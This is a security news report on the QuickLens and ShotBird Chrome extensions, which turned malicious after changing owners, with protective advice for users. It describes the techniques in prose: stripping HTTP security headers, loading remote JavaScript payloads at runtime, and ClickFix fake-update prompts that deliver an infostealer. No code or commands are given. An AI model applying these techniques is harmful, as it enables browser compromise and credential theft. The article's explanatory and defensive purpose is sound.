Two previously trusted Google Chrome extensions — QuickLens and ShotBird — have been transformed into attack tools following a change of ownership. Researchers from Annex Security and independent analyst monxresearch-sec documented how new versions of these extensions began executing arbitrary code, collecting user data, and distributing malware via fake Chrome update prompts.
Malicious Chrome extensions as a browser supply‑chain attack
Both extensions initially behaved as advertised. QuickLens, with roughly 7,000 installations, provided fast image search via Google Lens. ShotBird, installed about 800 times, was marketed as a “professional” screenshot and image tool with local processing. In January 2025, ShotBird was even labeled Featured in the Chrome Web Store — a marker many users interpret as a sign of higher trust and quality.
The risk emerged when the projects were sold. The QuickLens developer listed the extension on the trading platform ExtensionHub just two days after publication; on 1 February 2026 it was acquired by an account using [email protected]. According to the researchers, ShotBird was sold in February 2026. The malicious behavior appeared only after these ownership transfers.
This pattern highlights a growing browser extension supply‑chain vulnerability: a legitimate, popular extension with a positive reputation can silently turn into a malware distribution channel for thousands of users, with the switch occurring through a routine-looking update that few users scrutinize.
QuickLens: from helper tool to remote code execution platform
Tampering with HTTP security headers and bypassing browser defenses
On 17 February 2026, QuickLens received an update that preserved its visible functionality but embedded hidden malicious logic. The core change was interference with HTTP traffic: the extension began stripping security-related HTTP headers, including X-Frame-Options.
The X-Frame-Options header is widely used to prevent clickjacking and to control whether a site can be embedded in an <iframe>. Removing this and related protections weakens enforcement of Content Security Policy (CSP), making it easier for an attacker to inject and run arbitrary scripts on web pages viewed in the victim’s browser.
Remote payload delivery and stealthy telemetry collection
Annex Security reports that the modified QuickLens began collecting technical telemetry about users, including country, operating system, and browser version. Every five minutes, the extension contacted an external command‑and‑control server to fetch a new JavaScript payload, which was then executed within the browser context.
The malicious code was not present in the extension’s source files. Instead, payloads were downloaded at runtime, stored in the browser’s localStorage, and executed dynamically. This approach significantly complicates static code analysis, allows rapid changes to functionality without pushing a new Chrome Web Store release, and helps the attacker adapt campaigns in near real time.
ShotBird: fake Chrome update and forced malware installation
ClickFix social engineering through deceptive update prompts
With ShotBird, the threat actor relied primarily on social engineering. The extension started displaying a fake Google Chrome update notification, claiming that an error had occurred and user action was required.
The attack followed a pattern known as a ClickFix attack: the victim is guided step by step to open the Windows Run dialog, execute cmd.exe, and paste a prepared PowerShell command. Visually, this sequence is presented as a necessary troubleshooting step to “fix the update problem,” but in reality, the user is tricked into launching malicious code with elevated system privileges.
Infostealer payload disguised as googleupdate.exe
The PowerShell script downloads an executable named googleupdate.exe to the victim’s machine. Once launched, this binary behaves like a classic infostealer:
- captures data entered into web forms (usernames, passwords, PINs, payment details, authentication tokens);
- extracts saved passwords and browsing history from Chrome;
- exfiltrates the collected information to attacker‑controlled servers.
Researchers note that the command‑and‑control infrastructure, the ClickFix technique, and the abuse of extension ownership changes all point to a single threat actor orchestrating both QuickLens and ShotBird campaigns.
What this means for Chrome Web Store security
The QuickLens and ShotBird cases once again demonstrate that a “one‑time review” security model for browser extensions is no longer sufficient. Even extensions with Featured badges and strong user ratings can become malicious when ownership or development teams change.
Similar scenarios have been documented before, where widely used ad blockers or tab managers were acquired and then silently repurposed to inject intrusive ads, harvest traffic data, or run hidden cryptocurrency miners. Because the user interface and main features often remain intact, such shifts frequently go unnoticed.
While Google has tightened extension policies over time (for example, through Manifest V3, stricter permission models, and automated code analysis), the human trust factor remains a weak link. Users rarely review their installed extensions, and the Chrome Web Store does not yet make ownership changes highly visible or disruptive to end users.
How to protect yourself from malicious Chrome extensions
To reduce the risk of compromise via browser extensions, users and organizations should adopt the following practices:
- Minimize installed extensions. Keep only extensions that are truly necessary and routinely remove those you no longer use.
- Scrutinize permissions. Be cautious of extensions requesting access to “all sites” or the ability to read and modify data on every page you visit.
- Monitor behavior after updates. Treat sudden changes in pop‑ups, prompts, or required user actions as red flags, especially after recent updates.
- Ignore Chrome updates triggered by extensions. Legitimate Chrome updates are handled by the browser or operating system and will never require running commands in
cmd.exeor PowerShell. - Use modern security tools. Endpoint protection, antivirus, and EDR solutions with behavioral detection can help block suspicious PowerShell commands and unauthorized network connections.
QuickLens and ShotBird show how quickly a familiar, long‑installed extension can become a serious security threat with a single update. Regular “browser hygiene,” skepticism toward unexpected prompts, and conscious extension management significantly lower the chances of a successful attack and the theft of sensitive data.
